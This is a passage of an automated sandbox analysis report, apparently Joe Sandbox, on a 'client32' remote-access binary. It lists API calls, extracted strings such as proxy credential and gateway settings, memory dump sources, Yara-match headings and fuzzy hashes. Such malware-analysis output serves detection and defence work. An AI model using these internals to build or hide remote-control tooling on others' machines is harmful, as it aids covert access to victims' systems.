                                                        • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 111253CA
                                                        • SetLastError.KERNEL32(00000078), ref: 111253D0
                                                        • FreeLibrary.KERNEL32(?), ref: 1112553A
                                                        • FreeLibrary.KERNEL32(?), ref: 11125547
                                                        • FreeLibrary.KERNEL32(?), ref: 11125551
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressErrorLastProc$FreeLoadProcess$CountCurrentHandleInfoMemory__wcstoi64
                                                        • String ID: CheckLeaks$Client$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$User32.dll$_debug$psapi.dll
                                                        • API String ID: 4101391659-2960314602
                                                        • Opcode ID: 24f660dc49cf8063fb080170bf677cd14817b3fe85e91263a94df8b88c7d28d1
                                                        • Instruction ID: 9932062f5be36f07512d72675ff71bbfb044ef1448ff26fd2a4877b11468836e
                                                        • Opcode Fuzzy Hash: 24f660dc49cf8063fb080170bf677cd14817b3fe85e91263a94df8b88c7d28d1
                                                        • Instruction Fuzzy Hash: AAB125B0E05269AFDF50DFA9C8C4BDDFBB5BB48308F60446AE51AE7240EA705940CF51

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102C6D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: $18/03/14 09:15:42 V12.01F3$494126$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape
                                                        • API String ID: 1029625771-1354138522
                                                        • Opcode ID: bf17c5d3710b8a98e8f839d43164a9bb9925bd54a7e7670717860283893199c7
                                                        • Instruction ID: ca0982745070245b62b0d9423a17b587d5718592cb53d7dfc1a06a055831e232
                                                        • Opcode Fuzzy Hash: bf17c5d3710b8a98e8f839d43164a9bb9925bd54a7e7670717860283893199c7
                                                        • Instruction Fuzzy Hash: 09B1A475E002659FDB22DF948D84BEDF7B9BB45318F8481E9E90CA7244DB706A808F61

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6CB31370,?,0000001A), ref: 1102723D
                                                        • _strrchr.LIBCMT ref: 1102724C
                                                          • Part of subcall function 11152F3C: __stricmp_l.LIBCMT ref: 11152F79
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileModuleName__stricmp_l_strrchr
                                                        • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                        • API String ID: 1609618855-357498123
                                                        • Opcode ID: 138740f618a786b5ee3efac041f3e8d7d14c2bebde02be3fe677fdfd87e3208f
                                                        • Instruction ID: f6baba5e36d17a1f61544e27a43f00c9efa3f214cb3d29d370909431fefea075
                                                        • Opcode Fuzzy Hash: 138740f618a786b5ee3efac041f3e8d7d14c2bebde02be3fe677fdfd87e3208f
                                                        • Instruction Fuzzy Hash: 9B12E639C046A78FDB56CF24C890BD8BBA0AB3634CF5440E9DCD597241EB71958ACF92

                                                        Control-flow Graph

                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,?,00000001,?), ref: 1102ED78
                                                          • Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
                                                        • RegCloseKey.KERNEL32(?), ref: 1102EE0D
                                                          • Part of subcall function 11152C8A: __isdigit_l.LIBCMT ref: 11152CAF
                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1102EE95
                                                        • GetProcAddress.KERNEL32(00000000), ref: 1102EE9C
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 1102EEAA
                                                        • GetStockObject.GDI32(0000000D), ref: 1102F083
                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 1102F093
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1102F0D1
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1102F0D7
                                                        • InterlockedExchange.KERNEL32(02D08D18,00001388), ref: 1102F158
                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 1102F18A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorModeObject$AddressCloseExchangeHandleInfoInterlockedModuleNativeOpenProcQueryStockSystemValue__isdigit_l
                                                        • String ID: .%d$3$CurrentVersion$Error %s unloading audiocap dll$GetNativeSystemInfo$SOFTWARE\Microsoft\Windows NT\CurrentVersion$kernel32.dll$pcicl32$u:j$*6$M7
                                                        • API String ID: 3742979543-1875362328
                                                        • Opcode ID: b30e950a16208c9b80ba5814f786be33e61252569c30e4c8fcf91a30b9764def
                                                        • Instruction ID: 9d50fd4c4b4771c4e818bae6168a3bc14b0d19ca60a63814d56272cf95f99725
                                                        • Opcode Fuzzy Hash: b30e950a16208c9b80ba5814f786be33e61252569c30e4c8fcf91a30b9764def
                                                        • Instruction Fuzzy Hash: 8CF156B5D01265DEEF91CB60CC88BDDFAF4AB0530CF5441AEEC09A7281EA755E84CB52

                                                        Control-flow Graph

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 6C8151F5
                                                        • GetTickCount.KERNEL32 ref: 6C815240
                                                        • Sleep.KERNEL32(00000064), ref: 6C815275
                                                          • Part of subcall function 6C814F90: GetTickCount.KERNEL32 ref: 6C814FA1
                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6C815296
                                                        • _memmove.LIBCMT ref: 6C8152AD
                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6C8152CE
                                                        • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6C8152F3
                                                        • GetTickCount.KERNEL32 ref: 6C815306
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: CountTick$Sleep$ObjectSingleWait_memmoveselect
                                                        • String ID: FALSE$ResumeTimeout$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c$httprecv
                                                        • API String ID: 1069524698-4272157152
                                                        • Opcode ID: 44b8122b64c93034257dea3116607ca444f509b54f367f259ba94d10449c9234
                                                        • Instruction ID: 593d368d61dbfeb8c718b8080e9c3fdd6777ce14be9c65a4a7ba02494ad80cd7
                                                        • Opcode Fuzzy Hash: 44b8122b64c93034257dea3116607ca444f509b54f367f259ba94d10449c9234
                                                        • Instruction Fuzzy Hash: EAB1A3B1D042599FDB30DF68CE84BDA73B5AB05308F4049B9E549ABA40D7B4AAC4CFD1
                                                        APIs
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 11130DFA
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 3535843008-1157355927
                                                        • Opcode ID: 519f82d833db5c70aa90aaa52ac6864dd0292cdb3728e72bd5b4ca3116148888
                                                        • Instruction ID: 92f743161b8d2e512d760a62df3d5c411700057ac8f76655c4977d74fc17002b
                                                        • Opcode Fuzzy Hash: 519f82d833db5c70aa90aaa52ac6864dd0292cdb3728e72bd5b4ca3116148888
                                                        • Instruction Fuzzy Hash: A0420574E102959BEB21CB60CD40FDEFBB5AFC5319F0441D8D90967285EA726E84CF61
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas), ref: 110FC34A
                                                        • CloseHandle.KERNEL32(00000000), ref: 110FC359
                                                        • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 110FC36B
                                                        • LoadLibraryA.KERNEL32(?), ref: 110FC3A1
                                                        • GetProcAddress.KERNEL32(?,GrabKM), ref: 110FC3CE
                                                        • GetProcAddress.KERNEL32(?,LoggedOn), ref: 110FC3E6
                                                        • FreeLibrary.KERNEL32(?), ref: 110FC40B
                                                          • Part of subcall function 11102700: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7774C3F0,00000000,?,11103735,111032D0,00000001,00000000), ref: 11102717
                                                          • Part of subcall function 11102700: CreateThread.KERNEL32(00000000,11103735,00000001,00000000,00000000,0000000C), ref: 1110273A
                                                          • Part of subcall function 11102700: WaitForSingleObject.KERNEL32(?,000000FF,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102767
                                                          • Part of subcall function 11102700: CloseHandle.KERNEL32(?,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102771
                                                        • GetStockObject.GDI32(0000000D), ref: 110FC41F
                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 110FC42F
                                                        • InitializeCriticalSection.KERNEL32(0000003C), ref: 110FC44B
                                                        • InitializeCriticalSection.KERNEL32(111DBDA4), ref: 110FC456
                                                          • Part of subcall function 110FA7D0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11177D16,000000FF), ref: 110FA8A3
                                                          • Part of subcall function 110FA7D0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 110FA8EC
                                                        • CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC499
                                                          • Part of subcall function 11096D20: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D41
                                                          • Part of subcall function 11096D20: OpenProcessToken.ADVAPI32(00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D48
                                                          • Part of subcall function 11096D20: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 11096D67
                                                        • CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC4EA
                                                        • CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC543
                                                        • CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC587
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                        • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                        • API String ID: 3930710499-403456261
                                                        • Opcode ID: b4f7a2aa001f08eb1de94084590e4a4e84de2b21180eea1441a02a77e5a43ed9
                                                        • Instruction ID: 96122f269ef65589949905bb9c4ffe43a99982700637f7301abdf7ec8998ec3b
                                                        • Opcode Fuzzy Hash: b4f7a2aa001f08eb1de94084590e4a4e84de2b21180eea1441a02a77e5a43ed9
                                                        • Instruction Fuzzy Hash: 859191B5E01756AFDB11CFB48D8AB9EBBE4BB05308F044579E55AD7280E770AA40CB11
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 1106F615
                                                        • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 1106F61B
                                                        • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 1106F621
                                                        • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 1106F62A
                                                        • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 1106F630
                                                        • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 1106F636
                                                        • _strncpy.LIBCMT ref: 1106F698
                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 1106F6FF
                                                        • CreateThread.KERNEL32(00000000,00004000,Function_0006B810,00000000,00000000,?), ref: 1106F79C
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 1106F7A3
                                                        • SetTimer.USER32(00000000,00000000,000000FA,1105EF40), ref: 1106F7E7
                                                        • std::exception::exception.LIBCMT ref: 1106F898
                                                        • __CxxThrowException@8.LIBCMT ref: 1106F8B3
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                        • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                        • API String ID: 703120326-1497550179
                                                        • Opcode ID: cc7903dda24a66739fd7a13bbda9e0872c732d56e2d593b364654cf261e7dd3c
                                                        • Instruction ID: 100f990ebe536f4ae5a6f41c30aeaeafdd91ca27a0176a8e63e6253bf368b8ee
                                                        • Opcode Fuzzy Hash: cc7903dda24a66739fd7a13bbda9e0872c732d56e2d593b364654cf261e7dd3c
                                                        • Instruction Fuzzy Hash: 0FB1B5B5A00745AFDB10CF64CD84FDAF7F8BB48708F4085A9E60997281E7B0BA44CB65
                                                        APIs
                                                          • Part of subcall function 11134460: GetVersionExA.KERNEL32(111DC648,75A38400), ref: 11134490
                                                          • Part of subcall function 11134460: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
                                                          • Part of subcall function 11134460: _memset.LIBCMT ref: 111344ED
                                                          • Part of subcall function 11134460: _strncpy.LIBCMT ref: 111345AF
                                                          • Part of subcall function 11134460: RegCloseKey.KERNEL32(00000000), ref: 111345BF
                                                        • PostMessageA.USER32(0001042A,000006CF,00000007,00000000), ref: 11129AFF
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • SetWindowTextA.USER32(0001042A,00000000), ref: 11129BA7
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129C6C
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11129C8C
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129C9A
                                                        • SetForegroundWindow.USER32(00000000), ref: 11129CC8
                                                        • EnableWindow.USER32(0001042A,00000001), ref: 11129CD7
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129D28
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129D35
                                                        • EnableWindow.USER32(0001042A,00000000), ref: 11129D49
                                                        • EnableWindow.USER32(0001042A,00000000), ref: 11129CAF
                                                          • Part of subcall function 111228E0: ShowWindow.USER32(0001042A,11129D52,?,11129D52,00000007,?,?,?,?,?,00000000), ref: 111228EE
                                                        • EnableWindow.USER32(0001042A,00000001), ref: 11129D5D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableVisible$Foreground$CloseMessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                        • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                        • API String ID: 4194384052-3803836183
                                                        • Opcode ID: e43bb21f673ef14eee2c9dbecfac9de94a1951a9e343f6d3e521405f1ec23232
                                                        • Instruction ID: 8305938ea656916a4b1fbafb187925e2d273a1d2ad477454ab730d3f5b69f352
                                                        • Opcode Fuzzy Hash: e43bb21f673ef14eee2c9dbecfac9de94a1951a9e343f6d3e521405f1ec23232
                                                        • Instruction Fuzzy Hash: D3C1E575A012799FEF01DBA8DD84B5EF7A6AB4038CF604035ED199B2C4FB75A804CB91
                                                        APIs
                                                        • wsprintfA.USER32 ref: 6C80830B
                                                        • GetTickCount.KERNEL32 ref: 6C808365
                                                        • InterlockedExchange.KERNEL32(?,-6C848150), ref: 6C808376
                                                        • GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 6C8083AA
                                                        • WSAGetLastError.WSOCK32(?,00000000,?), ref: 6C8083CF
                                                        • InterlockedIncrement.KERNEL32(?), ref: 6C808491
                                                        Strings
                                                        • xx %02x, xrefs: 6C808319
                                                        • Error send returned 0 on connection %d, xrefs: 6C808445
                                                        • InternetWriteFile, xrefs: 6C8083A4
                                                        • Error %d sending HTTP request on connection %d, xrefs: 6C80842B
                                                        • Error %d writing inet request on connection %d, xrefs: 6C8083D9
                                                        • SendHttpReq failed, not connected to gateway!, xrefs: 6C8082C1
                                                        • %02x %02x, xrefs: 6C808305
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$AddressCountErrorExchangeIncrementLastProcTickwsprintf
                                                        • String ID: %02x %02x$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$InternetWriteFile$SendHttpReq failed, not connected to gateway!$xx %02x
                                                        • API String ID: 642105747-610509312
                                                        • Opcode ID: 2ac32dfb27fd76595202d7ddf9abe12999a6f6fc691531fd5b1d9b6c4d3b27f3
                                                        • Instruction ID: 5452a649523cb60f7993c90d64967079740d84bfc9f2eb055cd8df9e4fa18ff2
                                                        • Opcode Fuzzy Hash: 2ac32dfb27fd76595202d7ddf9abe12999a6f6fc691531fd5b1d9b6c4d3b27f3
                                                        • Instruction Fuzzy Hash: 66619171E006189FDB30CFA8DE44A9EB3B4BB45318F118A6AE819A7B41D730AD55CFD0
                                                        APIs
                                                        • OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 1102EB44
                                                        • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EB5D
                                                        • LoadLibraryA.KERNEL32(User32.dll,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EBBA
                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1102EBF8
                                                        • SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC0B
                                                        • WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC3C
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC49
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC54
                                                        • CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC5B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleLibraryMutex$AddressCreateErrorFreeLastLoadObjectOpenProcSingleWait
                                                        • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$User32.dll$_debug\trace$_debug\tracefile$istaUI$B`
                                                        APIs
                                                        • wsprintfA.USER32 ref: 1102C9AE
                                                        • wsprintfA.USER32 ref: 1102C9C6
                                                        • _strncpy.LIBCMT ref: 1102CA80
                                                        • CharUpperA.USER32(494126,?,?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 1102CAB1
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: wsprintf$CharUpper_strncpy
                                                        • String ID: $session$$%02d$%s.%02d$%session%$%sessionname%$18/03/14 09:15:42 V12.01F3$494126$IsA()$Warning: Unexpanded clientname=<%s>$client32 dbi %hs$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                         • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: wsprintf
                                                        • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(PCIINV.DLL,82E0FB89,030634C0,030634B0,?,00000000,11170D2C,000000FF,?,1102FD62,030634C0,00000000,?,?,?), ref: 11080745
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                          • Part of subcall function 11102970: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7774C3F0,?,1110371D,00000000,00000001,?,?,?,?,?,1102F49F), ref: 1110298E
                                                        • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108076B
                                                        • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108077F
